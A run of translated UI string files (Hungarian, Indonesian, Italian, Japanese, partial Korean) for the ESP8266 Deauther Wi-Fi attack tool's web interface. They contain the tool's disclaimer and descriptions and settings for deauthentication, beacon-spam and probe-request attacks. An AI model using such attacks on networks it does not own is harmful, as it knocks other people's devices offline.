"disclaimer": "Ez a projekt egy koncepció bizonyítása tesztelés, és tanulmányozás érdekében.\nSem az ESP8266-ot, sem annak SDK-ját nem szánták, vagy építették ilyen célokra. Hibák előfordulhatnak!\n\nCsak a saját hálózata, és eszközei ellen használja!\n\nA projekt valódi Wi-Fi frame-eket használ az IEEE 802.11 szabványban leírtak alapján, és nem blokkol, vagy zavar semmilyen frekvenciát.\nKérem ellenőrizze az országára vonatkozó jogi szabályozásokat a használat előtt!\n\nNe hivatkozzon a projektre mint \"jelzavaró\", az teljesen aláássa a projekt valódi célját!\nHa mégis, az csak azt bizonyítja, hogy semmit sem értett abból, amit ez a projekt képvisel.\nTartalom közzététele a megfelelő magyarázat nélkül, azt mutatja, hogy csak a kattintásokért, hírnévért, és/vagy pénzért csinálja, és nem tiszteli a szellemi tulajdont, a mögötte álló közösséget, valamint a harcot a jobb WiFi szabványért.\n\nTovábbi információért látogasson el az alábbi oldalra:",
"disclaimer-button": "Elolvastam, és megértettem a fenti figyelmeztetést",
"reload": "Újratöltés",
"scan": "Szkennelés",
"ssids": "SSID-k",
"attacks": "Támadások",
"settings": "Beállítások",
"info": "Információ",
"info_span": "INFORMÁCIÓ: ",
"all": "ÖSSZES",
"channel": "Csatorna",
"devices": "Mentett Eszközök",
"select_all": "ÖSSZES Kiválasztása",
"deselect_all": "ÖSSZES Kiválasztásának Visszavonása",
"remove_all": "ÖSSZES Eltávolítása",
"station_scan_time": "Állomáskeresési Idő",
"new": "Új",
"save": "Mentés",
"add": "Hozzáadás",
"add_selected": "Kiválasztott AP-k Klónozása",
"overwrite": "Felülírás",
"time_interval": "Időintervallum",
"number": "Szám",
"targets": "Célpontok",
"scan_info": "- Kattintson a Szkennelésre, és várjon amíg a kék LED az alaplapján kikapcsol (vagy zöldre vált), majd kattintson az Újratöltésre!\n- A webes felület nem lesz elérhető az állomáskeresés során, és újra csatlakozni kell!\n- Kérem csak egy célpontot válasszon!\n",
"ssids_info": "- Ez az SSID lista a beacon, és a probe támadásoknál lesz használva.\n- Egy SSID maximum 32 karakter hosszú lehet.\n- Ne felejtsen el a Mentésre kattintani az SSID módosítása után.\n- Az SSID-k klónozása után az Újrtöltés gombra kell kattintani.\n",
"attack_info": "- Lehetséges, hogy a támadás megkezdése után elveszíti a kapcsolatot!\n- Ki kell választania a célpontot a deauth támadáshoz.\n- Szükséges egy elmentett SSID a beacon, és a probe támadáshoz.\n- A csomagsebesség frissítéséhez kattintson az Újratöltés gombra.\n",
"settings_info": "- Néhány beállítás újraindítást igényel.\n- Kattintson a Mentésre, hogy meggyőződjön arról, hogy a módosításai alkalmazva lettek.\n",
"info_disclaimer": "Váratlan hiba esetén töltse be újra a webhelyet, és nézze meg a soros monitort a további hibakeresés érdekében.",
"start_stop": "START / STOP",
"start": "START",
"stop": "STOP",
"wifi_off": "WiFi Kikapcsolása",
"reboot": "Újraindítás",
"reset": "Visszaállítás",
"enable_random": "Véletlenszerű Mód Engedélyezése",
"disable_random": "Véletlenszerű Mód Letiltása",
"random_desc": "Engedélyezze a véletlenszerű módot egy véletlenszerű SSID lista generálásához egy adott intervallumban.",
"deauth_desc": "Bezárja a WiFi eszközök kapcsolatát azáltal, hogy deauthentication frame-ket küld a kiválasztott hozzáférési pontokhoz és kliens eszközökhöz.\nEz csak azért lehetséges, mert sok eszköz nem használja a 802.11w-2009 szabványt, amely védelmet nyújt a támadás ellen.\n- Kérem csak egy célpontot válasszon! Amikor több célpontot választ ki, amelyek különböző csatornákon futnak, és elindítja a támadást, az gyorsan váltani fog ezen csatornák között, és nincs esélye újból csatlakozni a webes felülethez.\n",
"beacon_desc": "Beacon csomagokat használnak a hozzáférési pontok hirdetéséhez. A beacon csomagok folyamatos küldésével úgy fog kinézni, mintha új WiFi hálózatokat hozott volna létre.\nBetudja állítani a hálózatok neveit SSID-ként.",
"probe_desc": "A kliensek probe kéréseket küldenek, hogy megkérdezzék, van-e ismert hálózat a közelben.\nEzzel a támadással megzavarhatja a WiFi követőket azáltal, hogy az SSID listában megadott hálózatokat kéri.\nNem valószínű, hogy az otthoni hálózattal bármilyen hatást fog tapasztalni, ha ezt a támadást használja.",
"setting_version": "Verziószám, pl. v2.0.\nEz a beállítás csak a forráskódból módosítható.",
"setting_ssid" : "A webes felülethez használt hozzáférési pont SSID-je (ha engedélyezve van).\nA hossznak 1 és 31 karakter között kell lennie.",
"setting_password": "A webes felülethez használt hozzáférési pont jelszava (ha engedélyezve van).\nA hossznak 8 és 31 karakter között kell lennie.",
"setting_channel": "Az indításkor használt alapértelmezett WiFi-csatorna.",
"setting_hidden": "Elrejti a webes felülethez használt hozzáférési pontot (ha engedélyezve van).",
"setting_captivePortal": "Engedélyezi a captive portal-t a hozzáférési ponthoz (ha engedélyezve van).",
"setting_autosave": "Engedélyezi az SSID-k, eszköznevek és beállítások automatikus mentését.",
"setting_autosavetime": "Időintervallum az automatikus mentésre milliszekundumban",
"setting_display": "Engedélyezi a kijelző felületét.",
"setting_displayTimeout": "Idő másodpercben, amely után a kijelző inaktív állapotban kikapcsol.\nA megjelenítési időkorlát letiltásához állítsa 0-ra.",
"setting_serial": "Engedélyezi a soros felületet.\nNem ajánlott letiltani!",
"setting_serialEcho": "Engedélyezi az echo-t minden soros úton érkező üzenetre.",
"setting_web": "Engedélyezi a webes felületet.",
"setting_webSpiffs": "Engedélyezi a SPIFFS-et az összes web fájlhoz.",
"setting_led": "Engedélyezi az (RGB) LED funciót.",
"setting_maxch": "Max. csatorna szkennelésre.\nUS = 11, EU = 13, Japán = 14.",
"setting_macAP": "A hozzáférési pont módhoz használt MAC-cím.\nFelhívjuk figyelmét, hogy a MAC-cím csak akkor helyettesíti a belső MAC-címet, ha az hozzáférési pont mód engedélyezve van.",
"setting_macSt": "Az állomás módhoz használt MAC-cím.\nFelhívjuk figyelmét, hogy a MAC-cím csak akkor váltja fel a belső MAC-címet, ha az állomás mód engedélyezve van.",
"setting_chtime": "Egy csatorna szkennelésének ideje ezredmásodpercben, mielőtt lépne a következőre (csak akkor, ha a csatornaugrás engedélyezve van).",
"setting_minDeauths": "A deauthentication frame-ek minimális száma szkenneléskor a LED deauth módra váltásához.",
"setting_attacktimeout": "Ennyi idő múlva (másodpercben) automatikusan leáll a támadás.\nA letiltáshoz állítsa 0-ra.",
"setting_forcepackets": "Ahány alkalommal megpróbál csomagot küldeni.\nÁllítsa ezt az értéket magasabbra, ha jobb csomagsebességet szeretne elérni egy forgalmas területen.\nLegyen óvatos, ez a beállítás lassabbá vagy instabilabbá teheti a készüléket.\nMax. érték 255!",
"setting_deauthspertarget": "Hány deauthentication és disassociation frame lett elküldve célpontonként.",
"setting_deauthReason": "Az okkód, amelyet a deauth frame-ekkel küldenek, hogy megmondja a céleszköznek, miért záródik le a kapcsolat.",
"setting_beaconchannel": "Ha engedélyezve van, akkor az összes frame-et különböző csatornákon küldi el beacon támadás futtatásakor.",
"setting_beaconInterval": "Ha igaz, a beacon frame-ek másodpercenként kerülnek kiküldésre. Ha hamisra állítja, az intervallum 100 ms lesz.\nHosszabb intervallum nagyobb stabilitást és kevesebb csomag spam-et jelent, de hosszabb ideig tarthat, amíg a kliensek megtalálják az SSID-ket szkennelés során.",
"setting_randomTX": "Engedélyezi a véletlenszerű átviteli teljesítményt a beacon, és probe request frame-ek küldéséhez.",
"setting_probesPerSSID": "Ennyi probe request frame lett elküldve minden egyes SSID-nek.",
"setting_lang": "A webes felület alapértelmezett nyelve.\nGyőződjön meg arról, hogy létezik a nyelvi fájl!"
} |
|
esp8266_deauther-2/web_interface/lang/in.lang | {
"lang": "in",
"warning": "PERINGATAN",
"disclaimer": "Proyek ini adalah bukti konsep untuk pengujian dan tujuan pendidikan.\nBaik ESP8266 maupun SDK-nya tidak dimaksudkan atau dibuat untuk tujuan tersebut. Bug bisa terjadi!\n\nGunakan hanya untuk jaringan dan perangkat Anda sendiri!\n\nIni menggunakan bingkai Wi-Fi valid yang dijelaskan dalam standar IEEE 802.11 dan tidak memblokir atau mengganggu frekuensi apa pun.\nHarap periksa peraturan hukum di negara Anda sebelum menggunakannya.\n\nHarap jangan merujuk proyek ini sebagai \"jammer\", yang benar-benar merusak tujuan sebenarnya dari proyek ini!\nJika Anda melakukannya, itu hanya membuktikan bahwa Anda tidak memahami apa pun tentang apa tujuan proyek ini.\nMenerbitkan konten tentang ini tanpa penjelasan yang tepat menunjukkan bahwa Anda hanya melakukannya untuk klik, ketenaran dan/atau uang dan tidak menghormati kekayaan intelektual, komunitas di baliknya, dan perjuangan untuk standar WiFi yang lebih baik.\n\nUntuk informasi lebih lanjut kunjungi:",
"disclaimer-button": "Saya telah membaca dan memahami pemberitahuan di atas",
"reload": "Muat ulang",
"scan": "Pindai",
"ssids": "SSID",
"attacks": "Serangan",
"settings": "Pengaturan",
"info": "Info",
"info_span": "INFO: ",
"all": "Semua",
"channel": "Channel",
"devices": "Perangkat Tersimpan",
"select_all": "Pilih Semua",
"deselect_all": "Hapus Semua",
"remove_all": "Menghapus semua",
"station_scan_time": "Station Scan Time",
"new": "Baru",
"save": "Simpan",
"add": "Tambah",
"add_selected": "Gandakan AP yang dipilih",
"overwrite": "Timpa",
"time_interval": "Jarak waktu",
"number": "Jumlah",
"targets": "Target",
"scan_info": "- Klik Scan dan tunggu sampai LED biru di papan Anda mati (atau berubah menjadi hijau), kemudian klik Reload.\n- Antarmuka web tidak akan tersedia selama pemindaian stasiun dan Anda harus terhubung kembali!\n- Pilih hanya satu target!\n",
"ssids_info": "- Daftar SSID ini digunakan untuk serangan beacon dan probe.\n- Setiap SSID bisa sampai 32 karakter.\n- Jangan lupa untuk mengklik simpan saat Anda mengedit SSID.\n- Anda harus mengklik Muat Ulang setelah mengkloning SSID.\n",
"attack_info": "- Anda mungkin kehilangan koneksi saat memulai serangan!\n- You need to select a target for the deauth attack.\n- Anda perlu memilih target untuk serangan deauth.\n- Klik muat ulang untuk menyegarkan kecepatan paket.\n",
"settings_info": "- Beberapa pengaturan memerlukan boot ulang.\n- Klik simpan untuk memastikan bahwa perubahan Anda diterapkan.\n",
"info_disclaimer": "Jika terjadi kesalahan tak terduga, muat ulang situs dan lihat monitor serial untuk debugging lebih lanjut.",
"start_stop": "MULAI / BERHENTI",
"start": "MULAI",
"stop": "BERHENTI",
"wifi_off": "WiFi Mati",
"reboot": "Nyalakan Ulang",
"reset": "Setel ulang",
"enable_random": "Aktifkan Mode Acak",
"disable_random": "Nonaktifkan Mode Acak",
"random_desc": "Aktifkan mode acak untuk menghasilkan daftar SSID acak dalam interval tertentu.",
"deauth_desc": "Menutup koneksi perangkat WiFi dengan mengirimkan bingkai pembatalan otentikasi ke titik akses dan perangkat klien yang Anda pilih.\nIni hanya mungkin karena banyak perangkat tidak menggunakan standar 802.11w-2009 yang menawarkan perlindungan terhadap serangan ini.\n- Harap hanya pilih satu target! Saat Anda memilih beberapa target yang berjalan di saluran yang berbeda dan memulai serangan, itu akan dengan cepat beralih di antara saluran tersebut dan Anda tidak memiliki kesempatan untuk menyambung kembali ke antarmuka web.\n",
"beacon_desc": "Paket beacon digunakan untuk mengiklankan titik akses. Dengan terus mengirimkan paket beacon, sepertinya Anda membuat jaringan WiFi baru.\nAnda dapat menentukan nama jaringan di bawah SSID.",
"probe_desc": "Permintaan penyelidikan dikirim oleh perangkat klien untuk menanyakan apakah ada jaringan yang dikenal di sekitar.\nGunakan serangan ini untuk membingungkan pelacak WiFi dengan menanyakan jaringan yang Anda tentukan dalam daftar SSID.\nSepertinya Anda tidak akan melihat dampak apa pun dari serangan ini dengan jaringan rumah Anda.",
"setting_version": "Nomor versi, yaitu v2.0.\nPengaturan ini hanya dapat diubah di kode sumber.",
"setting_ssid" : "SSID titik akses yang digunakan untuk antarmuka web (jika diaktifkan).\nPanjangnya harus antara 1 dan 31 karakter.",
"setting_password": "Kata sandi titik akses yang digunakan untuk antarmuka web (jika diaktifkan).\nPanjangnya harus antara 8 dan 31 karakter.",
"setting_channel": "Saluran WiFi default yang digunakan saat memulai.",
"setting_hidden": "Menyembunyikan titik akses yang digunakan untuk antarmuka web (jika diaktifkan).",
"setting_captivePortal": "Mengaktifkan portal tawanan untuk titik akses (jika diaktifkan).",
"setting_autosave": "Memungkinkan penyimpanan otomatis SSID, nama perangkat, dan pengaturan.",
"setting_autosavetime": "Interval waktu untuk penyimpanan otomatis dalam milidetik.",
"setting_display": "Mengaktifkan antarmuka tampilan.",
"setting_displayTimeout": "Waktu dalam detik setelah layar mati saat tidak aktif.\nUntuk menonaktifkan waktu tunggu tampilan, setel ke 0.",
"setting_serial": "Mengaktifkan antarmuka serial.\nDianjurkan untuk tidak menonaktifkannya!",
"setting_serialEcho": "Mengaktifkan echo untuk setiap pesan masuk melalui serial.",
"setting_web": "Mengaktifkan antarmuka web.",
"setting_webSpiffs": "Mengaktifkan SPIFFS untuk semua file web.",
"setting_led": "Mengaktifkan fitur LED (RGB).",
"setting_maxch": "Max. saluran untuk memindai.\nUS = 11, EU = 13, Jepang = 14.",
"setting_macAP": "Alamat MAC yang digunakan untuk mode titik akses.\nHarap dicatat bahwa alamat MAC hanya akan menggantikan alamat MAC internal ketika mode titik akses diaktifkan.",
"setting_macSt": "Alamat MAC yang digunakan untuk mode stasiun.\nHarap dicatat bahwa alamat MAC hanya akan menggantikan alamat MAC internal ketika mode stasiun diaktifkan.",
"setting_chtime": "Waktu untuk memindai satu saluran sebelum menuju saluran berikutnya dalam milidetik (hanya jika lompatan saluran diaktifkan).",
"setting_minDeauths": "Jumlah minimum bingkai pembatalan otentikasi saat memindai untuk mengubah LED ke mode pembatalan.",
"setting_attacktimeout": "Setelah berapa lama (dalam detik) serangan akan berhenti secara otomatis.\nSetel ke 0 untuk menonaktifkannya.",
"setting_forcepackets": "Berapa banyak percobaan untuk mengirim sebuah paket.\nTetapkan nilai ini lebih tinggi jika Anda ingin mendapatkan kecepatan paket yang lebih baik di area sibuk.\nHati-hati pengaturan ini dapat membuat perangkat lebih lambat atau lebih tidak stabil.\nNilai maks 255!",
"setting_deauthspertarget": "Berapa banyak frame deauthentication dan disassociation yang dikirim untuk setiap target.",
"setting_deauthReason": "Kode alasan yang dikirim dengan frame deauth untuk memberi tahu perangkat target mengapa koneksi akan ditutup.",
"setting_beaconchannel": "Jika diaktifkan, akan mengirim semua bingkai di saluran yang berbeda saat menjalankan serangan suar.",
"setting_beaconInterval": "Jika disetel benar, beacon akan dikirim setiap detik. Jika disetel ke false, interval akan menjadi 100 md.\nInterval yang lebih lama berarti lebih banyak stabilitas dan lebih sedikit spamming paket, tetapi bisa memakan waktu lebih lama hingga klien menemukan ssids saat memindai.",
"setting_randomTX": "Mengaktifkan daya transmisi acak untuk mengirimkan bingkai permintaan beacon dan probe.",
"setting_probesPerSSID": "Berapa banyak frame permintaan probe yang dikirim untuk setiap SSID.",
"setting_lang": "Bahasa default untuk antarmuka web.\nPastikan file bahasa ada!"
} |
|
esp8266_deauther-2/web_interface/lang/it.lang | {
"lang": "it",
"warning": "AVVERTIMENTO",
"disclaimer": "Questo progetto è una prova di concetto per scopi di test e didattici. \nNè l'ESP8266, né il relativo SDK sono stati progettati o costruiti per tali scopi. \n\nUtilizza i frame Wi-Fi validi descritti nello standard IEEE 802.11 e non bloccare o interrompere alcuna frequenza. \nSi prega di verificare le normative legali del proprio paese prima di utilizzarlo. \n\nSi prega di non fare riferimento a questo progetto come \"jammer\", questo mina totalmente il vero scopo di questo progetto!\nSe lo fai, dimostri solo che non hai capito nulla di ciò che questo progetto rappresenta. \nPubblicare il contenuto senza una spiegazione adeguata dimostra che lo fai solo per clic, fama e/o denaro e non ha alcun rispetto per la proprietà intellettuale, la comunità dietro di esso e la lotta per un migliore standard WiFi. \n\nPer maggiori informazioni visita:",
"disclaimer-button": "Ho letto e capito l'avviso di cui sopra",
"reload": "Ricaricare",
"scan": "scansione",
"ssids": "SSIDs",
"attacks": "Attacchi",
"settings": "Impostazioni",
"info": "Informazioni",
"info_span": "INFO: ",
"all": "Tutti",
"channel": "Canale",
"devices": "Dispositivi salvati",
"select_all": "Seleziona Tutto",
"deselect_all": "Deseleziona Tutto",
"remove_all": "Rimuovi Tutto",
"station_scan_time": "Tempo di scansione della stazione",
"new": "Nuovo",
"save": "Salvare",
"add": "Inserisci",
"add_selected": "Clona gli APs selezionati",
"overwrite": "Sovrascrivere",
"time_interval": "Intervallo di tempo",
"number": "Numero",
"targets": "Obiettivi",
"scan_info": "- Fai clic su Scansione e attendi fino a quando il LED blu sulla scheda si spegne (o diventa verde), quindi fai clic su Ricarica.\n- L'interfaccia web non sarà disponibile durante la scansione di una stazione e dovrai riconnetterti!\n- Seleziona solo un obiettivo!\n",
"ssids_info": "- Questo elenco SSID viene utilizzato per l'attacco beacon e probe.\n- Ogni SSID può contenere fino a 32 caratteri.\n- Non dimenticare di fare clic su Salva quando hai modificato un SSID.\n- Devi fare clic su Ricarica dopo la clonazione SSID.\n",
"attack_info": "- Potresti perdere la connessione quando avvii un attacco!\n- Devi selezionare un bersaglio per l'attacco deauth.\n- Hai bisogno di un SSID salvato per l'attacco beacon e l'attacco Probe.\n- Fai clic su ricarica per aggiornare la velocità del pacchetto.\n",
"settings_info": "- Alcune impostazioni richiedono un riavvio.\n- Fai clic su Salva per assicurarti che le modifiche siano applicate.\n",
"info_disclaimer": "In caso di errore imprevisto, ricarica il sito e controlla il monitor seriale per ulteriori debug.",
"start_stop": "AVVIO / STOP",
"start": "AVVIO",
"stop": "STOP",
"wifi_off": "WiFi Off",
"reboot": "Riavvio",
"reset": "Reset",
"enable_random": "Abilita la modalità casuale",
"disable_random": "Disabilita la modalità casuale",
"random_desc": "Abilitare la modalità casuale per generare un elenco SSID casuale in un dato intervallo.",
"deauth_desc": "Chiude la connessione dei dispositivi WiFi inviando i frame di deautenticazione agli access point e ai dispositivi client selezionati.\nQuesto è possibile solo perché molti dispositivi non utilizzano lo standard 802.11w-2009 che offre una protezione contro questo attacco.\n- Si prega di selezionare solo un bersaglio! Quando selezioni più bersagli che vengono eseguiti su canali diversi e avvii l'attacco, passerà rapidamente da questi canali e non avrai alcuna possibilità di riconnetterti all'interfaccia web.\n",
"beacon_desc": "I pacchetti beacon vengono utilizzati per pubblicizzare i punti di accesso. Inviando continuamente pacchetti di beacon, sembrerà che tu abbia creato nuove reti WiFi.\nÈ possibile specificare i nomi di rete sotto SSID.",
"probe_desc": "Le richieste di probe vengono inviate dai dispositivi client per chiedere se una rete nota si trova nelle vicinanze.\nUtilizzare questo attacco per confondere i tracker WiFi chiedendo le reti specificate nell'elenco SSID.\nÈ improbabile che non vedrete alcun impatto da questo attacco con la vostra rete Casalinga.",
"setting_version": "Numero di versione, ad esempio v2.0.\nQuesta impostazione può essere modificata solo nel codice sorgente.",
"setting_ssid" : "SSID del punto di accesso utilizzato per l'interfaccia Web (se abilitato).\nLa lunghezza deve essere compresa tra 1 e 31 caratteri.",
"setting_password": "Password del punto di accesso utilizzata per l'interfaccia Web (se abilitata).\nLa lunghezza deve essere compresa tra 8 e 31 caratteri.",
"setting_channel": "Canale WiFi predefinito che viene utilizzato all'avvio.",
"setting_hidden": "Nasconde il punto di accesso utilizzato per l'interfaccia Web (se abilitato).",
"setting_captivePortal": "Abilita il captive portal per il punto di accesso (se abilitato).",
"setting_autosave": "Abilita il salvataggio automatico di SSID, nomi di dispositivi e impostazioni.",
"setting_autosavetime": "Intervallo di tempo per il salvataggio automatico in millisecondi.",
"setting_display": "Abilita l'interfaccia display.",
"setting_displayTimeout": "Tempo in secondi dopo il quale il display si spegne quando inattivo.\nPer disabilitare il timeout del display, impostarlo su 0.",
"setting_serial": "Abilita l'interfaccia seriale.\nSi consiglia di non disattivarlo!",
"setting_serialEcho": "Abilita la ripetizione per ogni messaggio in arrivo su seriale.",
"setting_web": "Abilita l'interfaccia web.",
"setting_webSpiffs": "Abilita SPIFFS per tutti i file Web.",
"setting_led": "Abilita la funzione LED (RGB).",
"setting_maxch": "Max. canale su cui eseguire la scansione.\nUS = 11, EU = 13, Japan = 14.",
"setting_macAP": "Indirizzo MAC utilizzato per la modalità punto di accesso.\nSi noti che l'indirizzo MAC sostituirà solo l'indirizzo MAC interno quando la modalità punto di accesso è abilitata.",
"setting_macSt": "Indirizzo MAC utilizzato per la modalità stazione.\nSi prega di notare che l'indirizzo MAC sostituirà solo l'indirizzo MAC interno quando la modalità stazione è abilitata.",
"setting_chtime": "Tempo di scansione di un canale prima di passare al successivo in millisecondi (solo se il passaggio del canale è abilitato).",
"setting_minDeauths": "Numero minimo di frame di deautenticazione durante la scansione per cambiare la modalità LED in Deauth.",
"setting_attacktimeout": "Dopo quanto tempo (in secondi) l'attacco si fermerà automaticamente.\nImpostalo su 0 per disabilitarlo.",
"setting_forcepackets": "Quanti tentativi di invio di un pacchetto.\nImpostare questo valore più alto se si desidera ottenere una migliore velocità di pacchetto in un'area occupata.\nAttenzione che questa impostazione può rendere il dispositivo più lento o più instabile.\nIl valore massimo è 255!",
"setting_deauthspertarget": "Quanti frame di deautenticazione e disassociazione vengono inviati per ciascun target.",
"setting_deauthReason": "Il codice motivo che viene inviato con i frame deauth per dire al dispositivo di destinazione perché la connessione verrà chiusa.",
"setting_beaconchannel": "Se abilitato, invierà tutti i frame su diversi canali durante l'esecuzione di un attacco beacon.",
"setting_beaconInterval": "Se impostato vero, i beacon verranno inviati ogni secondo. Se impostato su falso, l'intervallo sarà 100 ms.\nUn intervallo più lungo significa maggiore stabilità e meno spamming dei pacchetti, ma potrebbe richiedere più tempo fino a quando i client trovano gli SSID durante la scansione.",
"setting_randomTX": "Abilita potenza di trasmissione randomizzata per l'invio di richieste frames di beacon e probe.",
"setting_probesPerSSID": "Quanti frames di richiesta probe vengono inviati per ciascun SSID.",
"setting_lang": "Lingua predefinita per l'interfaccia Web.\nAssicurarsi che il file della lingua esista!"
} |
|
esp8266_deauther-2/web_interface/lang/ja.lang | {
"lang": "ja",
"warning": "警告",
"disclaimer": "このプロジェクトはテスト及び学術的な目的の概念実証です。\nESP8266及び、そのSDKは、このような目的のためのものではないため。バグがあるかもしれません。\n\n所有するデバイスとネットワークに対してのみ使用してください。\n\nIEEE 802.11標準に記述された有効なWi-Fiフレームを用いており、遮断及び周波数の攪乱ではありません。\n使用する前に自国内の法規を確認してください。\n\nこのプロジェクトでの\"妨害\"を意図しないでください。それはこのプロジェクト本来の目的に反するものです。\nこのプロジェクトが意味するところを何も理解できていないことが証明されるだけです。\n適切な説明をせず、これに関するコンテンツを配布することは、クリックや名声・金銭目的の為であり、知的財産とその背後にあるコミュニティとWiFi標準を良くしていくための戦いに敬意を示さない事になります。\n\n詳細はこちらから:",
"disclaimer-button": "私は告示を読んで理解しました",
"reload": "再読込",
"scan": "スキャン",
"ssids": "SSID",
"attacks": "攻撃",
"settings": "設定",
"info": "情報",
"info_span": "情報: ",
"all": "全て",
"channel": "チャンネル",
"devices": "保存済みデバイス",
"select_all": "全選択",
"deselect_all": "全選択解除",
"remove_all": "全削除",
"station_scan_time": "ステーションのスキャン時間",
"new": "新規",
"save": "保存",
"add": "追加",
"add_selected": "選択APを複製",
"overwrite": "上書",
"time_interval": "間隔",
"number": "番号",
"targets": "対象",
"scan_info": "- SCANを押下してボード上の青色LED(充電中は緑色)が消灯してから、RELOADを押下します。\n- ステーションのスキャン中は再接続までWebインターフェイスを使用できません!\n- 対象を1つだけ選択してください。\n",
"ssids_info": "- このSSIDリストはビーコンと探査攻撃に使用されます。\n- SSIDは最大32文字まで。\n- SSIDを編集した時は忘れずに保存してください。\n- SSIDを複製した後は再読み込みしてください。\n",
"attack_info": "- 攻撃開始により接続が失われることがあります。\n- 認証解除攻撃には対象を選択する必要があります。\n- ビーコン・探査攻撃にはSSIDの保存が必要です。\n- 再読み込みのクリックによりパケットレートを更新します。\n",
"settings_info": "- いくつかの設定は再起動が必要です。\n- 保存をクリックして変更を反映します。\n",
"info_disclaimer": "例外エラーが生じた場合はページの再読み込みと、デバッグのためにシリアルモニターを確認してください。",
"start_stop": "開始 / 停止",
"start": "開始",
"stop": "停止",
"wifi_off": "WiFiオフ",
"reboot": "再起動",
"reset": "リセット",
"enable_random": "ランダムモード有効化",
"disable_random": "ランダムモード無効化",
"random_desc": "ランダムモードを有効にして、ランダムなSSIDを指定の間隔で生成します。",
"deauth_desc": "選択したAPとクライアントに認証解除フレームを送信してWiFiデバイスの接続を閉じます。\nこれは多くのデバイスが、この攻撃に対する保護をもたらす802.11w-2009標準に準じていないため可能になります。\n- 1つだけ対象を選択してください! 異なるチャンネルの複数の対象に攻撃を開始すると、それらのチャンネルがすぐに切り替わりWebインターフェイスに再接続する機会がなくなります。\n",
"beacon_desc": "ビーコンパケットはアクセスポイントのアドバタイズに使用されます。ビーコンパケットの継続的な送信は、WiFiネットワークを新しく作成したかのように見えます。\nSSID下のネットワーク名を指定できます。",
"probe_desc": "探査リクエストはクライアントが近隣に既知のネットワークが存在するか問い合わせます。\nこの攻撃はSSIDリストで指定されたネットワークへの問い合わせによってWiFiトラッカーを攪乱させます。\nホームネットワークに対して、この攻撃による影響はみられないでしょう。",
"setting_version": "バージョン v2.0.\nこの設定はソースコード内でのみ変更できます。",
"setting_ssid" : "Webインターフェイスで使用するアクセスポイントのSSID名(有効な場合)\n1~31文字である必要があります。",
"setting_password": "Webインターフェイスで使用するアクセスポイントのパスワード(有効な場合)\n8~31文字である必要があります。",
"setting_channel": "開始時に使用するデフォルトのWiFiチャンネル",
"setting_hidden": "Webインターフェイスで使用するアクセスポイントを隠す(有効な場合)",
"setting_captivePortal": "アクセスポイントのキャプティブポータルを有効にする(有効な場合)",
"setting_autosave": "SSID/デバイス名/設定を自動保存",
"setting_autosavetime": "自動保存の間隔(ミリ秒)",
"setting_display": "ディスプレイインターフェイスを有効にする",
"setting_displayTimeout": "非アクティブ時にディスプレイをオフにするまでの秒数\n0でディスプレイタイムアウトが無効になります。",
"setting_serial": "シリアルインターフェイスを有効化\n無効にしないことを推奨します!",
"setting_serialEcho": "シリアル経由のメッセージ毎のエコーを有効にする",
"setting_web": "Webインターフェイスを有効にする",
"setting_webSpiffs": "全てのWebファイルでSPIFFSを有効にする",
"setting_led": "(RGB)LED機能を有効にする",
"setting_maxch": "スキャンする最大チャンネル数\nアメリカ = 11, EU = 13, 日本 = 14",
"setting_macAP": "アクセスポイントモードで使用するMACアドレス\n アクセスポイントモードが有効な時にのみ内部MACアドレスを置き換えることに留意してください。",
"setting_macSt": "ステーションモードで使用するMACアドレス\nステーションモードが有効な時にのみ内部MACアドレスを置き換えることに留意してください。",
"setting_chtime": "順次スキャンで次に移るまでの個別のスキャンにかけるミリ秒(チャンネルホッピングが有効な場合のみ)",
"setting_minDeauths": "スキャン時に認証解除モードにLEDを変更するときの認証解除フレームの最小数",
"setting_attacktimeout": "指定時間(秒)後に自動的に攻撃を停止します。\n0で無効になります。",
"setting_forcepackets": "パケットの送信試行数\n混雑したエリアで良好なパケットレートを実現したい場合は値を高く設定します。\nこの設定がデバイスを遅く、より不安定にする可能性があることに注意してください。\n最大値は255です!",
"setting_deauthspertarget": "ターゲット毎に送信する認証解除・関連付け解除フレーム数",
"setting_deauthReason": "認証解除フレームで理由コードが送信されることにより対象デバイスに、なぜ接続が閉じられるか知らせます。",
"setting_beaconchannel": "有効にすると、ビーコン攻撃実行時に全フレームを異なるチャンネルに送信します。",
"setting_beaconInterval": "有効にすると、ビーコンが毎秒送信されます。無効の場合は100ミリ秒の間隔を開けます。\n間隔を長くするとパケットの安定性とスパムの低減をもたらしますが、スキャン時にクライアントがSSIDを見つけるまで時間を要する事があります。",
"setting_randomTX": "探査リクエストフレームと送出ビーコンの送信出力をランダムにする",
"setting_probesPerSSID": "SSID毎に送信する探査リクエストフレーム数",
"setting_lang": "Webインターフェイスのデフォルト言語\n言語ファイルが存在するか確認してください!"
} |
|
esp8266_deauther-2/web_interface/lang/ko.lang | {
"lang": "ko",
"warning": "경고",
"disclaimer": "이 프로젝트는 교육목적 또는 테스트를 위해 만들어졌습니다.\nESP8266외 다른기기에서 오류가 발생할수 있습니다!\n\n절대로 공공장소에서 사용하지마세요 자신 네트워크 장치에서만 사용하세요!\n\nIEEE 802.11 표준에 설명된 유효한 Wi-Fi 프레임을 사용하며 그외 다른 주파수를 차단하거나 방해하지 않습니다.\n해당 장치를 사용하기전에 이용중인 국가의 규정을 확인하세요.\n\n제발 이 프로젝트명을 \"재머\", 라고 칭하지말아주세요! 저희는 재머 용도로 프로젝트를 진행한게 아닙니다!\n만약 당신이 재머라고 부르면 당신은 이 프로젝트를 이해를 못했다고 생각합니다.\n적절한 설명 없이 이것을 실행한다면 추후 문제가 발생할 가능성이 높습니다.\n\n자세한 내용은 아래 링크를 접속해서 확인해주세요 :)",
"disclaimer-button": "저는 위 경고를 모두 읽고 이해를 했습니다",
"reload": "리로드",
"scan": "스캔",
"ssids": "SSID설정",
"attacks": "공격",
"settings": "설정",
"info": "정보",
"info_span": "정보: ",
"all": "전체",
"channel": "채널",
"devices": "기기 저장",
"select_all": "전체선택",
"deselect_all": "전체선택취소",
"remove_all": "전체 삭제",
"station_scan_time": "스테이션 스캔 시간",
"new": "새로 만들기",
"save": "저장",
"add": "추가",
"add_selected": "선택한 AP 복제",
"overwrite": "덮어쓰기",
"time_interval": "시간간격",
"number": "개수",
"targets": "타켓 수",
"scan_info": "- 스캔하는 동안 보드에 파란색 혹식 녹색 LED가 들어옵니다 작동중이라는 표시이니 기다리세요.\n- 스테이션 스캔을 진행하고있을떄 웹 인터페이스가 잠시 멈추니 재연결해야합니다.\n- 오직 대상을 하나만 선택하세요!\n",
